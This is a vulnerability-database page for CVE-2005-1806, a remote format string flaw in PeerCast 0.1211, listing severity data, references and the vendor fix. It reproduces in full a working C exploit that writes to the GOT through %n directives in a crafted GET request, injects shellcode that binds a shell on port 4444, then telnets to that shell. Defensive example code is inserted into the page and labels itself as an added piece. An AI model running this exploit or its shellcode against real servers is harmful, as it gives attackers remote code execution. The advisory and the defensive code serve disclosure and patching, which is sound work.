CVE-2005-1806
CVSS 7.5
Published: 2005-05-28 00:00:00
Revised: 2016-10-17 23:22:35

[Original text] Format string vulnerability in PeerCast 0.1211 and earlier allows remote attackers to execute arbitrary code via format strings in the URL.


[CNNVD] PeerCast URL Format String Handling Vulnerability (CNNVD-200505-1220)

PeerCast is a peer-to-peer streaming media server similar to shoutcast.
PeerCast has a format string handling vulnerability in the way it processes user requests; an attacker may exploit it to execute arbitrary commands on the host.
The format string vulnerability in PeerCast may allow an attacker to execute arbitrary code on a remote target with the privileges of the user running peercast, or to crash the server.

- CVSS (base score)

CVSS score: 7.5 [HIGH]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (affected platforms and products)

Product and version information (CPE) not yet available

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1806
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-1806
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200505-1220
(official data source) CNNVD

- Other links and resources

http://marc.info/?l=bugtraq&m=111746603629979&w=2
(UNKNOWN)  BUGTRAQ  20050528 Format String Vulnerability In Peercast 0.1211 And Earlier
http://www.gentoo.org/security/en/glsa/glsa-200506-15.xml
(UNKNOWN)  GENTOO  GLSA-200506-15
http://www.gulftech.org/?node=research&article_id=00077-05282005
(VENDOR_ADVISORY)  MISC  http://www.gulftech.org/?node=research&article_id=00077-05282005
http://www.peercast.org/forum/viewtopic.php?p=11596
(VENDOR_ADVISORY)  CONFIRM  http://www.peercast.org/forum/viewtopic.php?p=11596
http://www.vupen.com/english/advisories/2005/0651
(UNKNOWN)  VUPEN  ADV-2005-0651

- Vulnerability information

PeerCast URL Format String Handling Vulnerability
High severity  Format string
2005-05-28 00:00:00 2005-10-20 00:00:00
Remote

- Advisories and patches

The vendor has released an upgrade patch that fixes this security issue; please download it from the vendor's home page:
        http://www.peercast.org/forum/viewtopic.php?p=11596

- Vulnerability information (1055)

PeerCast <= 0.1211 Remote Format String Exploit (EDBID:1055)
linux remote
2005-06-20 Verified
7144 darkeagle
N/A
/*
\		PeerCast <= 0.1211 remote format string exploit 
/			     [<< Public Release >>]
\
/ by Darkeagle [ darkeagle [at] linkin-park [dot] cc ]  
\								
/	uKt researcherz [ http://unl0ck.org ]
\
/ greetz goes to: uKt researcherz.
\
/
\ - smallest code - better code!!!
/
*/

#include <stdio.h>
#include <stdlib.h>
#include <stdarg.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <netdb.h>


//*******************************************
#define doit( b0, b1, b2, b3, addr )  { \
             b0 = (addr >> 24) & 0xff;  \
             b1 = (addr >> 16) & 0xff;  \
             b2 = (addr >>  8) & 0xff;  \
             b3 = (addr      ) & 0xff;  \
}
//*******************************************



//****************************************************************
char shellcode[] = // binds 4444 port
"\x31\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x85"
"\x4f\xca\xdf\x83\xeb\xfc\xe2\xf4\xb4\x94\x99\x9c\xd6\x25\xc8\xb5"
"\xe3\x17\x53\x56\x64\x82\x4a\x49\xc6\x1d\xac\xb7\x94\x13\xac\x8c"
"\x0c\xae\xa0\xb9\xdd\x1f\x9b\x89\x0c\xae\x07\x5f\x35\x29\x1b\x3c"
"\x48\xcf\x98\x8d\xd3\x0c\x43\x3e\x35\x29\x07\x5f\x16\x25\xc8\x86"
"\x35\x70\x07\x5f\xcc\x36\x33\x6f\x8e\x1d\xa2\xf0\xaa\x3c\xa2\xb7"
"\xaa\x2d\xa3\xb1\x0c\xac\x98\x8c\x0c\xae\x07\x5f";
//****************************************************************


//****************************
#define HOST "127.0.0.1"
#define PORT 7144
#define GOTADDR 0x0809da9c
#define SHELLADDR 0x49adb23c
//****************************



//****************************************************************************************
char *
evil_builder( unsigned int retaddr, unsigned int offset, unsigned int base, long figure )
{
  char * buf;
  unsigned char b0, b1, b2, b3;
  int start = 256;

  doit( b0, b1, b2, b3, retaddr );
  buf = (char *)malloc(999);
  memset( buf, 0, 999 );

 b3 -= figure;
 b2 -= figure;
 b1 -= figure;
 b0 -= figure;

 snprintf( buf, 999,
           "%%%dx%%%d$n%%%dx%%%d$n%%%dx%%%d$n%%%dx%%%d$n",
	     b3 - 16 + start - base, offset, 
             b2 - b3 + start, offset + 1, 
             b1 - b2 + start, offset + 2,
             b0 - b1 + start, offset + 3 );

  return buf;
}
//****************************************************************************************




//****************************************************************************************
int
main( int argc, char * argv[] )
{
  struct sockaddr_in addr;
  int sock;
  char * fmt;
  char endian[31337], da_shell[31337];
  unsigned long locaddr, retaddr;
  unsigned int offset, base;
  unsigned char b0, b1, b2, b3;

  system("clear");
  printf("*^*^*^ PeerCast <= 0.1211 remote format string exploit ^*^*^*\n");
  printf("*^*^*^                    by Darkeagle                 ^*^*^*\n");
  printf("*^*^*^      uKt researcherz [ http://unl0ck.org ]      ^*^*^*\n\n");   

  memset( endian, 0x00, 31337 );
  memset( da_shell, 0x00, 31337 );

  addr.sin_family = AF_INET;
  addr.sin_port = htons(PORT);
  addr.sin_addr.s_addr = inet_addr(HOST);

  sock = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);

  locaddr = GOTADDR;
  retaddr = SHELLADDR;
  offset  = 1265; // GET /html/en/index.htmlAAA%1265$x and you will get AAAA41414141

  doit( b0, b1, b2, b3, locaddr );

  base = 4;
  printf("[*] Buildin' evil code\n");
  strcat(endian, "GET /html/en/index.html");
  snprintf( endian+strlen(endian), sizeof(endian) - strlen(endian), /* remaining space, not the whole buffer size */
            "%c%c%c%c"
            "%c%c%c%c"
            "%c%c%c%c"
            "%c%c%c%c",
             b3, b2, b1, b0,
             b3 + 1, b2, b1, b0,
             b3 + 2, b2, b1, b0,
             b3 + 3, b2, b1, b0 );

 fmt = evil_builder( retaddr, offset, base, 0x10 );

 memset(fmt+strlen(fmt), 0x55, 32);
 strcat(fmt, shellcode);
 strcat(endian, fmt);
 strcat(endian, "\r\n\r\n\r\n");
 printf("[+] Buildin' complete!\n");
 sprintf(da_shell, "telnet %s 4444", HOST);

 // just go, y0!
 printf("[*] Connectin'\n");
 if ( connect(sock, (struct sockaddr*)&addr, sizeof(addr)) ) { printf("[-] Connection failed!\n\n"); exit(0); }

 printf("[+] Connected!\n");
 printf("[*] Sleepin'\n");
 sleep(1);

 printf("[*] Sendin'\n");
 send(sock, endian, strlen(endian), 0);

 printf("[*] Sleepin'\n");
 sleep(1);
 	
 printf("[*] Connectin' in da shell\n\n");
 sleep(1);
 system(da_shell);
 return 0;
}
//****************************************************************************************

// milw0rm.com [2005-06-20]
		

- Vulnerability information

16906
PeerCast URL Error Message Format String
Local / Remote, Context Dependent Input Manipulation
Loss of Integrity Upgrade
Exploit Public Vendor Verified

- Vulnerability description

- Timeline

2005-05-28 Unknown
2005-06-21 Unknown

- Solution

Upgrade to version 0.1212 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- References

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

Peercast.org PeerCast Remote Format String Vulnerability
Input Validation Error 13808
Yes No
2005-05-30 12:00:00 2009-07-12 02:56:00
Discovery is credited to James Bercegay of the GulfTech Security Research Team.

- Affected program versions

peercast.org PeerCast 0.1211
Gentoo Linux
peercast.org PeerCast 0.1212

- Unaffected program versions

peercast.org PeerCast 0.1212

- Vulnerability discussion

PeerCast is affected by a remote format string vulnerability.

The vulnerability arises when the server attempts to handle a malformed HTTP GET request. A successful attack may result in crashing the server or lead to arbitrary code execution. This may facilitate unauthorized access.

PeerCast 0.1211 and prior versions are affected by this issue.
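The flaw class described in the discussion above and in the CNNVD summary (the path of an HTTP GET request reaching a printf-style routine as its format string) in minimal form. This is an added example, not PeerCast's code and not taken from any advisory on this page; the function names are hypothetical. It shows the fixed logging call, plus a scanner a server could run over a request path to detect printf directives (including `%n`, the write primitive the public exploit relies on) before the path reaches any logging or error-message routine. The vulnerable call itself appears only as a comment, because modern compilers reject it under `-Werror=format-security`.

```c
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical request logger illustrating the vulnerability class on this
 * page. Not PeerCast's code.
 *
 * Vulnerable pattern (left as a comment; it does not compile under
 * -Werror=format-security, which is the right outcome):
 *
 *     snprintf(out, outlen, path);      // path is attacker-controlled
 *
 * A path such as "/html/en/index.html%1265$x" is then parsed as directives,
 * and "%n" variants turn the bug into an arbitrary memory write. */

/* Fixed pattern: the request path is always an argument to a literal format. */
int log_request_safe(char *out, size_t outlen, const char *path)
{
    return snprintf(out, outlen, "GET %s", path);
}

/* Count printf directives hidden in a string: every '%' that is not the first
 * half of a literal "%%". Optionally reports whether any directive is a "%n"
 * (after flags, width, precision, length modifier or a positional "N$"). */
int count_format_directives(const char *s, bool *has_percent_n)
{
    int n = 0;
    if (has_percent_n) *has_percent_n = false;
    for (const char *p = s; *p; p++) {
        if (*p != '%') continue;
        if (p[1] == '%') { p++; continue; }   /* "%%" prints a literal '%' */
        n++;
        /* skip everything that may precede the conversion character */
        const char *q = p + 1;
        while (*q && strchr("0123456789$#-+ .'hlLqjzt", *q)) q++;
        if (*q == 'n' && has_percent_n) *has_percent_n = true;
    }
    return n;
}

/* Gatekeeper a server could apply to a request path before it reaches any
 * logging or error-message routine: reject anything containing a directive. */
bool request_path_is_safe(const char *path)
{
    bool pn;
    return count_format_directives(path, &pn) == 0;
}

int main(void)
{
    /* constructed sample paths: a benign one and one carrying directives */
    const char *benign = "/html/en/index.html";
    const char *hostile = "/html/en/index.html%1265$x%4$n";
    bool pn;
    char line[128];

    printf("%s -> %d directives\n", benign, count_format_directives(benign, &pn));
    printf("%s -> %d directives, %%n present: %d\n", hostile,
           count_format_directives(hostile, &pn), pn);
    log_request_safe(line, sizeof line, hostile);
    printf("safe log line: %s\n", line);   /* directives survive as plain text */
    return 0;
}
```

Note that a raw, percent-encoded URL (for example `100%25`) also trips the scanner; that is intended, since a lone `%` is an incomplete directive to printf as well, and the correct fix is to never let the path become a format string at all, not to filter it.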

- Exploit

Darkeagle <darkeagle@linkin-park.cc> provided the 'p33r-b33r.c' proof of concept exploit.

cybertronic@gmx.net provided the 'peercast_format_string.c' proof of concept exploit.

- Solution

The vendor has released PeerCast 0.1212 to address this issue.

Gentoo Linux has released advisory GLSA 200506-15 to address this issue. Users of affected packages are urged to execute the following commands with superuser privileges:
emerge --sync
emerge --ask --oneshot --verbose ">=media-sound/peercast-0.1212"
Please see the referenced advisory for further information.


peercast.org PeerCast 0.1211

- References


About the SCAP Chinese Community

The SCAP Chinese Community is the first Chinese open community in China devoted to SCAP. For more information, see [About this site]

Copyright notice

CVE/CWE/OVAL are registered trademarks of the MITRE Corporation; their official data sources are maintained on MITRE's related websites